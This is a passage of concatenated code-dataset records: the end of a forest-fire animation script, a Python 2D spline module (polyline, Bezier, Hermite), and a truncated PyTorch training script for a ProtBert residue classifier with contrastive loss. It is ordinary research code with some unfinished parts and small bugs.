plot_size[1]), ylim=(0, plot_size[0]))\n # a = maps[0]\n # im = ax.imshow(a, interpolation='none', vmin=0, vmax=2)\n # # I like to position my colorbars this way, but you don't have to\n # div = make_axes_locatable(ax)\n # cax = div.append_axes('right', '5%', '5%')\n # cb = fig.colorbar(im, cax=cax)\n #\n #\n # # initialization function: plot the background of each frame\n # def init():\n # im.set_data(np.zeros(field_size))\n # return [im]\n #\n #\n # # animation function. This is called sequentially\n # def animate(i):\n # global maps\n # a = im.get_array()\n # im.set_array(maps[i])\n # return [im]\n #\n #\n # # call the animator. blit=True means only re-draw the parts that have changed.\n # anim = animation.FuncAnimation(fig, animate, init_func=init,\n # frames=n_iterations, interval=400, blit=True)\n\n # save the animation as an mp4. This requires ffmpeg or mencoder to be\n # installed. The extra_args ensure that the x264 codec is used, so that\n # the video can be embedded in html5. You may need to adjust this for\n # your system: for more information, see\n # http://matplotlib.sourceforge.net/api/animation_api.html\n\n\n #anim = make_animation(maps)\n #anim.save('/Users/chludwig/Documents/UniHD/teaching/CS4Geographers/SS19/git/cs4geos19/exercises/ex3/forest_on_fires/forest_fire.mp4', fps=10, extra_args=['-vcodec', 'libx264'])\n\n #plt.show()\n\n\n\n\n\n\n\n","sub_path":"forest_fire_chl.py","file_name":"forest_fire_chl.py","file_ext":"py","file_size_in_byte":6535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"341510842","text":"# math2d_spline.py\n\nimport math\n\nfrom math2d_vector import Vector\n\nclass Spline(object):\n def __init__(self):\n self.point_list = []\n\n def Deserialize(self, json_data):\n self.point_list = [Vector().Deserialize(point_data) for point_data in json_data]\n return self\n\n def Serialize(self):\n return [point.Serialize() for point in self.point_list]\n\n def Interpolate(self, value):\n # All derivatives should provide a parametrization in [0,1].\n # Ideally, if the curve has length L, then a parameter P would yield\n # the point on the curve along it at length L*P. If this property is\n # satisfied, then we'll say the curve has a uniform parameterization.\n raise Exception('Pure virtual call.')\n\n def FindStepSizeForDistance(self, value, distance, step_size_delta = 0.05, eps = 0.01):\n step_size = 0.05\n pointA = self.Interpolate(value)\n while True:\n pointB = self.Interpolate(value + step_size)\n length = (pointA - pointB).Length()\n if math.fabs(length - distance) < eps:\n break\n if (length > distance and step_size_delta > 0.0) or (length < distance and step_size_delta < 0.0):\n step_size_delta = -step_size_delta / 2.0\n step_size += step_size_delta\n return step_size\n\n def Length(self):\n pass\n # A default implementation here could integrate along the spline.\n # We would want to use adaptive step sizing to account for non-uniform parametrizations.\n\n def Render(self, step_length=0.0, step_size=0.5):\n from OpenGL.GL import glBegin, glEnd, glVertex2f, GL_LINE_STRIP\n glBegin(GL_LINE_STRIP)\n value = 0.0\n try:\n while value < 1.0:\n point = self.Interpolate(value)\n glVertex2f(point.x, point.y)\n if step_length > 0.0:\n step_size = self.FindStepSizeForDistance(value, step_length)\n value += step_size\n value = 1.0\n point = self.Interpolate(value)\n glVertex2f(point.x, point.y)\n finally:\n glEnd()\n\nclass PolylineSpline(Spline):\n def __init__(self):\n super().__init__()\n\n def Interpolate(self, value, length=None):\n from math2d_line_segment import LineSegment\n if length is None:\n length = self.Length()\n distance = length * value\n if distance < 0.0 or distance > length:\n raise Exception('Invalid parameter value.')\n i = 0\n point = None\n while distance >= 0.0:\n point = self.point_list[i]\n line_segment = LineSegment(self.point_list[i], self.point_list[i + 1])\n segment_length = line_segment.Lenght()\n if segment_length < distance:\n distance -= segment_length\n i += 1\n else:\n lerp_value = segment_length / distance\n point = line_segment.Lerp(lerp_value)\n break\n return point\n\n def Length(self):\n from math2d_line_segment import LineSegment\n if len(self.point_list) < 2:\n return 0.0\n length = 0.0\n for i in range(len(self.point_list) - 1):\n line_segment = LineSegment(self.point_list[i], self.point_list[i + 1])\n length += line_segment.Length()\n return length\n\nclass BezierSpline(Spline):\n def __init__(self):\n super().__init__()\n\n def Interpolate(self, value):\n from math2d_line_segment import LineSegment\n point_list = [point for point in self.point_list]\n while len(point_list) > 1:\n new_point_list = []\n for i in range(len(point_list) - 1):\n line_segment = LineSegment(point_list[i], point_list[i + 1])\n new_point_list.append(line_segment.Lerp(value))\n point_list = new_point_list\n return point_list[0]\n\nclass HermiteSpline(Spline):\n def __init__(self):\n super().__init__()\n\n def Deserialize(self, json_data):\n if type(json_data) is list:\n return super().Deserialize(json_data)\n elif type(json_data) is dict:\n self.point_list = []\n self.point_list.append(Vector().Deserialize(json_data['start_pos']))\n self.point_list.append(Vector().Deserialize(json_data['end_pos']))\n self.point_list.append(Vector().Deserialize(json_data['start_tan']))\n self.point_list.append(Vector().Deserialize(json_data['end_tan']))\n return self\n\n def Serialize(self):\n json_data = {\n 'start_pos': self.point_list[0].Serialize(),\n 'end_pos': self.point_list[1].Serialize(),\n 'start_tan': self.point_list[2].Serialize(),\n 'end_tan': self.point_list[3].Serialize()\n }\n return json_data\n\n def Interpolate(self, value):\n value_squared = value * value\n value_cubed = value_squared * value\n start_pos = self.point_list[0]\n end_pos = self.point_list[1]\n start_tan = self.point_list[2]\n end_tan = self.point_list[3]\n return (start_pos * ((2.0 * value_cubed) - (3.0 * value_squared) + 1.0)) +\\\n (start_tan * (value_cubed - (2.0 * value_squared) + value)) +\\\n (end_tan * (value_cubed - value_squared)) +\\\n (end_pos * ((-2.0 * value_cubed) + (3.0 * value_squared)))","sub_path":"math2d_spline.py","file_name":"math2d_spline.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"399382176","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/5/7 17:01\n# @Author : WANG Ruheng\n# @Email : blwangheng@163.com\n# @IDE : PyCharm\n# @FileName: protBert_main.py\n\nimport sys\nimport os\n\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\n\n\nfrom configuration import config as cf\nfrom util import util_metric\nfrom train.model_operation import save_model, adjust_model\nfrom train.visualization import dimension_reduction, penultimate_feature_visulization\nimport prot_bert\nimport data_loader_protBert\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport sys\nimport time\nimport pickle\nimport seaborn as sns\nimport random\n\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = '0,1'\n\nSEED = 42\nnp.random.seed(SEED)\ntorch.manual_seed(SEED)\ntorch.cuda.manual_seed_all(SEED)\ntorch.backends.cudnn.deterministic=True\ntorch.backends.cudnn.benchmark = False\ndef D(p, z, version='simplified'): # negative cosine similarity\n if version == 'original':\n z = z.detach() # stop gradient\n p = F.normalize(p, dim=1) # l2-normalize\n z = F.normalize(z, dim=1) # l2-normalize\n return -(p*z).sum(dim=1).mean()\n\n elif version == 'simplified':# same thing, much faster. Scroll down, speed test in __main__\n return 1 - F.cosine_similarity(p, z, dim=-1)\n else:\n raise Exception\nclass ContrastiveLoss(torch.nn.Module):\n def __init__(self, margin=2.0):\n super(ContrastiveLoss, self).__init__()\n self.margin = margin\n\n def forward(self, output1, output2, label):\n # euclidean_distance: [128]\n # euclidean_distance = F.pairwise_distance(output1, output2)\n cos_distance = D(output1, output2)\n # print(\"ED\",euclidean_distance)\n loss_contrastive = torch.mean((1 - label) * torch.pow(cos_distance, 2) + # calmp夹断用法\n (label) * torch.pow(torch.clamp(self.margin - cos_distance, min=0.0), 3))\n\n return loss_contrastive\n\ndef load_data(config):\n train_iter_orgin, test_iter = data_loader_protBert.load_data(config)\n print('-' * 20, 'data construction over', '-' * 20)\n return train_iter_orgin, test_iter\n\ndef draw_figure_CV(config, fig_name):\n sns.set(style=\"darkgrid\")\n plt.figure(22, figsize=(16, 12))\n plt.subplots_adjust(wspace=0.2, hspace=0.3)\n\n for i, e in enumerate(train_acc_record):\n train_acc_record[i] = e.cpu().detach()\n\n for i, e in enumerate(train_loss_record):\n train_loss_record[i] = e.cpu().detach()\n\n for i, e in enumerate(valid_acc_record):\n valid_acc_record[i] = e.cpu().detach()\n\n for i, e in enumerate(valid_loss_record):\n valid_loss_record[i] = e.cpu().detach()\n\n plt.subplot(2, 2, 1)\n plt.title(\"Train Acc Curve\", fontsize=23)\n plt.xlabel(\"Step\", fontsize=20)\n plt.ylabel(\"Accuracy\", fontsize=20)\n plt.plot(step_log_interval, train_acc_record)\n plt.subplot(2, 2, 2)\n plt.title(\"Train Loss Curve\", fontsize=23)\n plt.xlabel(\"Step\", fontsize=20)\n plt.ylabel(\"Loss\", fontsize=20)\n plt.plot(step_log_interval, train_loss_record)\n plt.subplot(2, 2, 3)\n plt.title(\"Validation Acc Curve\", fontsize=23)\n plt.xlabel(\"Epoch\", fontsize=20)\n plt.ylabel(\"Accuracy\", fontsize=20)\n plt.plot(step_valid_interval, valid_acc_record)\n plt.subplot(2, 2, 4)\n plt.title(\"Validation Loss Curve\", fontsize=23)\n plt.xlabel(\"Step\", fontsize=20)\n plt.ylabel(\"Loss\", fontsize=20)\n plt.plot(step_valid_interval, valid_loss_record)\n\n plt.savefig(config.result_folder + '/' + fig_name + '.png')\n plt.show()\n\n\ndef draw_figure_train_test(config, fig_name):\n sns.set(style=\"darkgrid\")\n plt.figure(22, figsize=(16, 12))\n plt.subplots_adjust(wspace=0.2, hspace=0.3)\n\n for i, e in enumerate(train_acc_record):\n train_acc_record[i] = e.cpu().detach()\n\n for i, e in enumerate(train_loss_record):\n # train_loss_record[i] = e.cpu().detach()\n train_loss_record[i] = e\n\n for i, e in enumerate(test_acc_record):\n test_acc_record[i] = e.cpu().detach()\n\n for i, e in enumerate(test_loss_record):\n # test_loss_record[i] = e.cpu().detach()\n test_loss_record[i] = e\n\n plt.subplot(2, 2, 1)\n plt.title(\"Train Acc Curve\", fontsize=23)\n plt.xlabel(\"Step\", fontsize=20)\n plt.ylabel(\"Accuracy\", fontsize=20)\n plt.plot(step_log_interval, train_acc_record)\n plt.subplot(2, 2, 2)\n plt.title(\"Train Loss Curve\", fontsize=23)\n plt.xlabel(\"Step\", fontsize=20)\n plt.ylabel(\"Loss\", fontsize=20)\n plt.plot(step_log_interval, train_loss_record)\n plt.subplot(2, 2, 3)\n plt.title(\"Test Acc Curve\", fontsize=23)\n plt.xlabel(\"Epoch\", fontsize=20)\n plt.ylabel(\"Accuracy\", fontsize=20)\n plt.plot(step_test_interval, test_acc_record)\n plt.subplot(2, 2, 4)\n plt.title(\"Test Loss Curve\", fontsize=23)\n plt.xlabel(\"Step\", fontsize=20)\n plt.ylabel(\"Loss\", fontsize=20)\n plt.plot(step_test_interval, test_loss_record)\n\n plt.savefig(config.result_folder + '/' + fig_name + '.png')\n plt.show()\n\n\ndef cal_loss_dist_by_cosine(model):\n embedding = model.embedding\n loss_dist = 0\n\n vocab_size = embedding[0].tok_embed.weight.shape[0]\n d_model = embedding[0].tok_embed.weight.shape[1]\n\n Z_norm = vocab_size * (len(embedding) ** 2 - len(embedding)) / 2\n\n for i in range(len(embedding)):\n for j in range(len(embedding)):\n if i < j:\n cosin_similarity = torch.cosine_similarity(embedding[i].tok_embed.weight, embedding[j].tok_embed.weight)\n loss_dist -= torch.sum(cosin_similarity)\n # print('cosin_similarity.shape', cosin_similarity.shape)\n loss_dist = loss_dist / Z_norm\n return loss_dist\n\n\ndef get_loss(logits, label, criterion):\n loss = criterion(logits, label)\n loss = loss.float()\n # flooding method\n loss = (loss - config.b).abs() + config.b\n\n # multi-sense loss\n # alpha = -0.1\n # loss_dist = alpha * cal_loss_dist_by_cosine(model)\n # loss += loss_dist\n return loss\n\ndef get_val_loss(logits, label, criterion):\n loss = criterion(logits.view(-1, config.num_class), label.view(-1))\n loss = (loss.float()).mean()\n # flooding method\n loss = (loss - config.b).abs() + config.b\n Q_sum = len(logits)\n logits = F.softmax(logits, dim=1) # softmax归一化\n hat_sum_p0 = logits[:, 0].sum()/Q_sum # 负类的概率和\n hat_sum_p1 = logits[:, 1].sum()/Q_sum # 正类的概率和\n mul_hat_p0 = hat_sum_p0.mul(torch.log(hat_sum_p0))\n mul_hat_p1 = hat_sum_p1.mul(torch.log(hat_sum_p1))\n mul_p0 = logits[:, 0].mul(torch.log(logits[:, 0])).sum()/Q_sum\n mul_p1 = logits[:, 1].mul(torch.log(logits[:, 1])).sum()/Q_sum\n # sum_loss = loss+(-1)*(mul_hat_p0+mul_hat_p1) + 0.1*(mul_p0+mul_p1)\n sum_loss = loss+(mul_hat_p0+mul_hat_p1)-0.1*(mul_p0+mul_p1)\n return sum_loss\n\ndef periodic_test(test_iter, model, criterion, config, sum_epoch):\n print('#' * 60 + 'Periodic Test' + '#' * 60)\n test_metric, test_loss, test_repres_list, test_label_list, \\\n test_roc_data, test_prc_data = model_eval(test_iter, model, criterion, config)\n\n print('test current performance')\n # print('[ACC,\\t\\tPrecision,\\t\\tSensitivity,\\t\\tSpecificity,\\t\\tF1,\\t\\tAUC,\\t\\tMCC,\\t\\tTP,\\t\\tFP,\\t\\tTN,\\t\\tFN]')\n print('[ACC,\\t\\tPrecision,\\t\\tSensitivity,\\tSpecificity,\\t\\tF1,\\t\\tAUC,\\t\\t\\tMCC,\\t\\t TP, \\t\\tFP,\\t\\t\\tTN, \\t\\t\\tFN]')\n # print(test_metric.numpy())\n plmt = test_metric.numpy()\n print('%.5g\\t\\t' % plmt[0], '%.5g\\t\\t' % plmt[1], '%.5g\\t\\t' % plmt[2], '%.5g\\t\\t' % plmt[3], '%.5g\\t' % plmt[4],\n '%.5g\\t\\t' % plmt[5], '%.5g\\t\\t' % plmt[6], '%.5g\\t\\t' % plmt[7], ' %.5g\\t\\t' % plmt[8], ' %.5g\\t\\t' % plmt[9], ' %.5g\\t\\t' % plmt[10])\n print('#' * 60 + 'Over' + '#' * 60)\n\n step_test_interval.append(sum_epoch)\n test_acc_record.append(test_metric[0])\n test_loss_record.append(test_loss)\n\n return test_metric, test_loss, test_repres_list, test_label_list\n\n\ndef periodic_valid(valid_iter, model, criterion, config, sum_epoch):\n print('#' * 60 + 'Periodic Validation' + '#' * 60)\n\n valid_metric, valid_loss, valid_repres_list, valid_label_list, \\\n valid_roc_data, valid_prc_data = model_eval(valid_iter, model, criterion, config)\n\n print('validation current performance')\n print('[ACC,\\tPrecision,\\tSensitivity,\\tSpecificity,\\tF1,\\tAUC,\\tMCC]')\n print(valid_metric.numpy())\n print('#' * 60 + 'Over' + '#' * 60)\n\n step_valid_interval.append(sum_epoch)\n valid_acc_record.append(valid_metric[0])\n valid_loss_record.append(valid_loss)\n\n return valid_metric, valid_loss, valid_repres_list, valid_label_list\n\n\ndef train_ACP(train_iter, valid_iter, test_iter, model, optimizer, criterion, contras_criterion, config, iter_k):\n best_acc = 0\n best_performance = 0\n train_batch_loss = 0\n for epoch in range(1, config.epoch + 1):\n steps = 0\n train_epoch_loss = 0\n train_correct_num = 0\n train_total_num = 0\n current_batch_size = 0\n repres_list = []\n label_list = []\n label_b = []\n output_b = []\n logits_b = []\n model.train()\n random.shuffle(train_iter)\n for batch in train_iter:\n input, label = batch\n label = torch.tensor(label, dtype=torch.long).cuda()\n output = model.forward(input)\n logits = model.get_logits(input)\n # repres_list.extend(output.cpu().detach().numpy())\n # label_list.extend(label.cpu().detach().numpy())\n output = output.view(-1, output.size(-1))\n logits = logits.view(-1, logits.size(-1))\n label = label[1:-1]\n logits = logits[1:-1]\n output = output[1:-1]\n output_b.append(output)\n logits_b.append(logits)\n label_b.append(label)\n\n current_batch_size += 1\n if current_batch_size % config.batch_size == 0:\n output_b = torch.cat(output_b, dim=0)\n logits_b = torch.cat(logits_b, dim=0)\n label_b = torch.cat(label_b, dim=0)\n label_b = label_b.view(-1)\n logits_b = logits_b.view(-1, logits_b.size(-1))\n output_b = output_b.view(-1, output_b.size(-1))\n #contrastive loss\n label_ls = []\n # weight_ls = []\n contras_len = len(output_b) // 2\n label1 = label_b[:contras_len]\n label2 = label_b[contras_len:contras_len*2]\n for i in range(contras_len):\n xor_label = (label1[i] ^ label2[i])\n label_ls.append(xor_label.unsqueeze(0))\n # if (label1[i] & label2[i]):\n # weight_ls.append(10*label1[i].unsqueeze(0))\n # elif (label1[i] | label2[i]):\n # weight_ls.append((label1[i] & label2[i]).unsqueeze(0))\n # else:\n # weight_ls.append((1-label1[i]).unsqueeze(0))\n contras_label = torch.cat(label_ls)\n # contras_weight = torch.cat(weight_ls)\n output1 = output_b[:contras_len]\n output2 = output_b[contras_len:contras_len*2]\n contras_loss = contras_criterion(output1, output2, contras_label)\n\n # ce_loss = get_loss(logits, label, criterion)\n ce_loss = criterion(logits_b, label_b)\n loss = ce_loss + contras_loss\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n steps = steps + 1\n train_batch_loss = loss.item()\n train_epoch_loss += train_batch_loss\n\n # logits3 = torch.unsqueeze(logits, 0)\n # label3 = torch.unsqueeze(label, 0)\n corre = (torch.max(logits_b, 1)[1] == label_b).int()\n corrects = corre.sum()\n train_correct_num += corrects\n the_batch_size = label_b.size(0)\n train_total_num += the_batch_size\n train_acc = 100.0 * corrects / the_batch_size\n\n label_b = []\n output_b = []\n logits_b = []\n\n '''Periodic Train Log'''\n if steps % config.interval_log == 0:\n # batch_pro_len = label.size(1)\n # m = torch.zeros_like(label)\n # B, seq_len = label.size()\n # for i in range(B):\n # pro_len = label[i][0]\n # batch_pro_len += pro_len\n # for j in range(1, pro_len + 1):\n # m[i][j] = 1\n\n # corre = torch.mm(corre, m.t())\n # index = torch.arange(0, B).view(1, -1)\n # corre = corre.gather(0, index)\n # corre = torch.mul(corre, m)\n\n sys.stdout.write(\n '\\rEpoch[{}] Batch[{}] - loss: {:.6f} | ACC: {:.4f}%({}/{})'.format(epoch, steps,\n train_batch_loss,\n train_acc,\n corrects,\n the_batch_size))\n print()\n\n step_log_interval.append(steps)\n train_acc_record.append(train_acc)\n train_loss_record.append(train_batch_loss)\n\n sum_epoch = iter_k * config.epoch + epoch\n print(f\"Train - Epoch[{epoch}] - loss: {train_epoch_loss/(len(train_iter)//config.batch_size)} | ACC: {(train_correct_num/train_total_num)*100:.4f}%({train_correct_num}/{train_total_num})\")\n\n '''Periodic Validation'''\n if valid_iter and sum_epoch % config.interval_valid == 0:\n valid_metric, valid_loss, valid_repres_list, valid_label_list = periodic_valid(valid_iter,\n model,\n criterion,\n config,\n sum_epoch)\n valid_acc = valid_metric[0]\n if valid_acc > best_acc:\n best_acc = valid_acc\n best_performance = valid_metric\n\n '''Periodic Test'''\n if test_iter and sum_epoch % config.interval_test == 0:\n time_test_start = time.time()\n\n test_metric, test_loss, test_repres_list, test_label_list = periodic_test(test_iter,\n model,\n criterion,\n config,\n sum_epoch)\n '''Periodic Save'''\n # save the model if specific conditions are met\n test_acc = test_metric[5]\n if test_acc > best_acc:\n best_acc = test_acc\n best_performance = test_metric\n # if config.save_best and best_acc > config.threshold:\n # torch.save({\"best_auc\": best_acc, \"model\": model.state_dict()}, f'{best_acc}.pl')\n\n test_label_list = [x + 2 for x in test_label_list]\n repres_list.extend(test_repres_list)\n label_list.extend(test_label_list)\n\n '''feature dimension reduction'''\n # if sum_epoch % 1 == 0 or epoch == 1:\n # dimension_reduction(repres_list, label_list, epoch)\n\n '''reduction feature visualization'''\n # if sum_epoch % 5 == 0 or epoch == 1 or (epoch % 2 == 0 and epoch <= 10):\n # penultimate_feature_visulization(repres_list, label_list, epoch)\n #\n # time_test_end = time.time()\n # print('inference time:', time_test_end - time_test_start, 'seconds')\n\n return best_performance\n\n\ndef model_eval(data_iter, model, criterion, config):\n device = torch.device(\"cuda\" if config.cuda else \"cpu\")\n label_pred = torch.empty([0], device=device)\n label_real = torch.empty([0], device=device)\n pred_prob = torch.empty([0], device=device)\n\n print('model_eval data_iter', len(data_iter))\n\n iter_size, corrects, avg_loss = 0, 0, 0\n repres_list = []\n label_list = []\n\n model.eval()\n with torch.no_grad():\n # random.shuffle(data_iter)\n for batch in data_iter:\n input, label = batch\n # input = input.cuda()\n label = torch.tensor(label, dtype=torch.long)\n #.cuda()\n # pssm = torch.tensor(pssm, dtype=torch.float).cuda()\n # input = torch.unsqueeze(input, 0)\n l_clone = label.clone()\n # label = torch.unsqueeze(label, 0)\n l_clone = l_clone[1:-1]\n # pssm = torch.unsqueeze(pssm, 0)\n # 修改\n # label = label.view(-1)\n logits = model.get_logits(input)\n output = model.forward(input)\n logits = logits[1:-1]\n # logits = torch.unsqueeze(logits[:, :2], 0)\n\n repres_list.extend(logits.cpu().detach().numpy())\n label_list.extend(l_clone.cpu().detach().numpy())\n\n return repres_list, label_list\n\n\ndef k_fold_CV(train_iter_orgin, test_iter, config):\n valid_performance_list = []\n\n for iter_k in range(config.k_fold):\n print('=' * 50, 'iter_k={}'.format(iter_k + 1), '=' * 50)\n\n # Cross validation on training set\n train_iter = [x for i, x in enumerate(train_iter_orgin) if i % config.k_fold != iter_k]\n valid_iter = [x for i, x in enumerate(train_iter_orgin) if i % config.k_fold == iter_k]\n print('----------Data Selection----------')\n print('train_iter index', [i for i, x in enumerate(train_iter_orgin) if i % config.k_fold != iter_k])\n print('valid_iter index', [i for i, x in enumerate(train_iter_orgin) if i % config.k_fold == iter_k])\n\n print('len(train_iter_orgin)', len(train_iter_orgin))\n print('len(train_iter)', len(train_iter))\n print('len(valid_iter)', len(valid_iter))\n if test_iter:\n print('len(test_iter)', len(test_iter))\n print('----------Data Selection Over----------')\n\n if config.model_name == 'ACPred_LAF_Basic':\n model = ACPred_LAF_Basic.BERT(config)\n elif config.model_name == 'ACPred_LAF_MSE':\n model = ACPred_LAF_MSE.BERT(config)\n elif config.model_name == 'ACPred_LAF_MSC':\n model = ACPred_LAF_MSC.BERT(config)\n elif config.model_name == 'ACPred_LAF_MSMC':\n model = ACPred_LAF_MSMC.BERT(config)\n\n if config.cuda: model.cuda()\n adjust_model(model)\n\n optimizer = torch.optim.AdamW(model.parameters(), lr=config.lr, weight_decay=config.reg)\n criterion = nn.CrossEntropyLoss()\n model.train()\n\n print('=' * 50 + 'Start Training' + '=' * 50)\n valid_performance = train_ACP(train_iter, valid_iter, test_iter, model, optimizer, criterion, config, iter_k)\n print('=' * 50 + 'Train Finished' + '=' * 50)\n\n print('=' * 40 + 'Cross Validation iter_k={}'.format(iter_k + 1), '=' * 40)\n valid_metric, valid_loss, valid_repres_list, valid_label_list, \\\n valid_roc_data, valid_prc_data = model_eval(valid_iter, model, criterion, config)\n print('[ACC,\\tPrecision,\\tSensitivity,\\tSpecificity,\\tF1,\\tAUC,\\tMCC]')\n print(valid_metric.numpy())\n print('=' * 40 + 'Cross Validation Over' + '=' * 40)\n\n valid_performance_list.append(valid_performance)\n\n '''draw figure'''\n draw_figure_CV(config, config.learn_name + '_k[{}]'.format(iter_k + 1))\n\n '''reset plot data'''\n global step_log_interval, train_acc_record, train_loss_record, \\\n step_valid_interval, valid_acc_record, valid_loss_record\n step_log_interval = []\n train_acc_record = []\n train_loss_record = []\n step_valid_interval = []\n valid_acc_record = []\n valid_loss_record = []\n\n return model, valid_performance_list\n\n\ndef train_test(train_iter, test_iter, config):\n # print('=' * 50, 'train-test', '=' * 50)\n # print('len(train_iter)', len(train_iter))\n # print('len(test_iter)', len(test_iter))\n # START_TAG = \"\"\n # STOP_TAG = \"\"\n # label_alphabet = ['0', '1']\n # tag_to_ix = {}\n # for i in range(len(label_alphabet)):\n # tag_to_ix[label_alphabet[i]] = i\n # tag_to_ix[START_TAG] = len(label_alphabet)\n # tag_to_ix[STOP_TAG] = len(label_alphabet) + 1\n\n # 加载\n model = prot_bert.BERT(config)\n # path = 'bert_finetuned_model.pkl'\n # save_model = torch.load(path)\n # model_dict = model.state_dict()\n # state_dict = {k: v for k, v in save_model.items() if k in model_dict.keys()}\n # print(state_dict.keys())\n # model_dict.update(state_dict)\n # model.load_state_dict(model_dict)\n\n # model = prot_bert.BERT(config)\n if config.cuda:\n model.cuda()\n # model = torch.nn.DataParallel(model).cuda()\n # model = model.module\n adjust_model(model)\n\n optimizer = torch.optim.AdamW(params=model.parameters(), lr=config.lr, weight_decay=config.reg)\n # criterion = nn.CrossEntropyLoss()\n # criterion = focal_loss(alpha=0.5, gamma=1, num_classes=2)\n # criterion = WCE_loss(weight = 11)\n contras_criterion = ContrastiveLoss()\n criterion = nn.CrossEntropyLoss(weight=torch.FloatTensor([1, 17])).to(config.device) # weighted update (1:17)\n # criterion = nn.CrossEntropyLoss(weight=torch.FloatTensor([1, 17])).cuda()\n # criterion = DiceLoss(with_logits=True, alpha=0.01, square_denominator=True)\n # criterion = DiceLoss(with_logits=True, smooth=1e-4, ohem_ratio=0.0,\n # alpha=0.01, square_denominator=True,\n # reduction=\"mean\")\n #weight = 9.03636364\n # criterion = Sampled_CE_loss(sample_time=25)\n # model.train()\n\n print('=' * 50 + 'Start Training' + '=' * 50)\n best_performance = train_ACP(train_iter, None, test_iter, model, optimizer, criterion, contras_criterion, config, 0)\n print('=' * 50 + 'Train Finished' + '=' * 50)\n\n print('*' * 60 + 'The Last Test' + '*' * 60)\n last_test_metric, last_test_loss, last_test_repres_list, last_test_label_list, \\\n last_test_roc_data, last_test_prc_data = model_eval(test_iter, model, criterion, config)\n print('[ACC,\\t\\tPrecision,\\t\\tSensitivity,\\t\\tSpecificity,\\t\\tF1,\\t\\tAUC,\\t\\tMCC,\\t\\tTP,\\t\\tFP,\\t\\tTN,\\t\\tFN]')\n # print(last_test_metric.numpy())\n lmt = last_test_metric.numpy()\n print('%.5g\\t\\t' % lmt[0] , '%.5g\\t\\t' % lmt[1], '%.5g\\t\\t' % lmt[2], '%.5g\\t\\t' % lmt[3], '%.5g\\t' % lmt[4], '%.5g\\t\\t' % lmt[5], '%.5g\\t\\t' % lmt[6],\n '%.5g\\t\\t' % lmt[7], ' %.5g\\t\\t' % lmt[8], ' %.5g\\t\\t' % lmt[9], ' %.5g\\t\\t' % lmt[10])\n print('*' * 60 + 'The Last Test Over' + '*' * 60)\n\n return model, best_performance, last_test_metric\n\n\ndef select_dataset():\n # path_train_data = '/home/weileyi/wrh/work_space/train_new1.tsv'\n path_train_data = '/home/u2600582/wrh/Dataset/dataset1/TR1154_no_cut.tsv'\n # path_train_data = '/home/u2600582/wrh/Dataset/dataset2/TR640_no_cut.tsv'\n \n # path_test_data = '/home/u2600582/wrh/Dataset/dataset2/TR640_no_cut.tsv'\n # path_train_data = '/home/weileyi/wrh/work_space/test.tsv'\n # path_test_data = '/home/weileyi/wrh/work_space/test_new1.tsv'\n # path_test_data = '/home/u2600582/wrh/Dataset/dataset1/TS125_no_cut.tsv'\n path_test_data = '/home/u2600582/wrh/Dataset/dataset2/TS639_no_cut.tsv'\n # path_test_data = '/home/u2600582/wrh/Dataset/visual/4l3oA.tsv'\n # path_test_data = '/home/u2600582/wrh/Dataset/visual/1fchA.tsv'\n # path_test_data = '/home/u2600582/wrh/Dataset/dataset3/CBH30.tsv'\n # path_test_data = '/home/u2600582/wrh/Dataset/dataset3/DNA30.tsv'\n # path_test_data = '/home/u2600582/wrh/Dataset/dataset3/RNA30.tsv'\n\n return path_train_data, path_test_data\n\n\ndef load_config():\n '''The following variables need to be actively determined for each training session:\n 1.train-name: Name of the training\n 2.path-config-data: The path of the model configuration. 'None' indicates that the default configuration is loaded\n 3.path-train-data: The path of training set\n 4.path-test-data: Path to test set\n\n Each training corresponds to a result folder named after train-name, which contains:\n 1.report: Training report\n 2.figure: Training figure\n 3.config: model configuration\n 4.model_save: model parameters\n 5.others: other data\n '''\n\n '''Set the required variables in the configuration'''\n train_name = 'ACPred-LAF'\n path_config_data = None\n path_train_data, path_test_data = select_dataset()\n\n '''Get configuration'''\n if path_config_data is None:\n config = cf.get_train_config()\n else:\n config = pickle.load(open(path_config_data, 'rb'))\n\n '''Modify default configuration'''\n # config.epoch = 50\n\n '''Set other variables'''\n # flooding method\n b = 0.06\n # model_name = 'ACPred_LAF_Basic'\n # model_name = 'ACPred_LAF_MSE'\n # model_name = 'ACPred_LAF_MSC'\n # model_name = 'ACPred_LAF_MSMC'\n\n if config.model_name == 'ACPred_LAF_Basic' or config.model_name == 'ACPred_LAF_MSE':\n config.if_multi_scaled = False\n else:\n config.if_multi_scaled = True\n\n '''initialize result folder'''\n result_folder = '../result/' + config.learn_name\n if not os.path.exists(result_folder):\n os.makedirs(result_folder)\n\n '''Save all variables in configuration'''\n config.train_name = train_name\n config.path_train_data = path_train_data\n config.path_test_data = path_test_data\n\n config.b = b\n # config.if_multi_scaled = if_multi_scaled\n # config.model_name = model_name\n config.result_folder = result_folder\n\n return config\n\n\nif __name__ == '__main__':\n np.set_printoptions(linewidth=400, precision=4)\n time_start = time.time()\n\n '''load configuration'''\n config = load_config()\n\n '''set device'''\n # torch.cuda.set_device(config.device)\n\n '''load data'''\n train_iter, test_iter = load_data(config)\n print('=' * 20, 'load data over', '=' * 20)\n\n '''draw preparation'''\n step_log_interval = []\n train_acc_record = []\n train_loss_record = []\n step_valid_interval = []\n valid_acc_record = []\n valid_loss_record = []\n step_test_interval = []\n test_acc_record = []\n test_loss_record = []\n\n '''train procedure'''\n valid_performance = 0\n best_performance = 0\n last_test_metric = 0\n\n if config.k_fold == -1:\n # train and test\n model = prot_bert.BERT(config)\n \n #path = 'Dataset1_AUC:0.815080211458067,MCC:0.38696326734790976.pl'\n #path = 'Ablation_AUC:0.8057846960270298,MCC:0.3215546773543976.pl'\n path = 'Dataset2_AUC:0.803924193022281,MCC:0.31610547434377495.pl'\n #path = 'Ablation2_AUC:0.7942322804208128,MCC:0.29163646230242035.pl'\n save_model = torch.load(path)['model']\n model_dict = model.state_dict()\n state_dict = {k: v for k, v in save_model.items() if k in model_dict.keys()}\n #print(state_dict.keys())\n model_dict.update(state_dict)\n 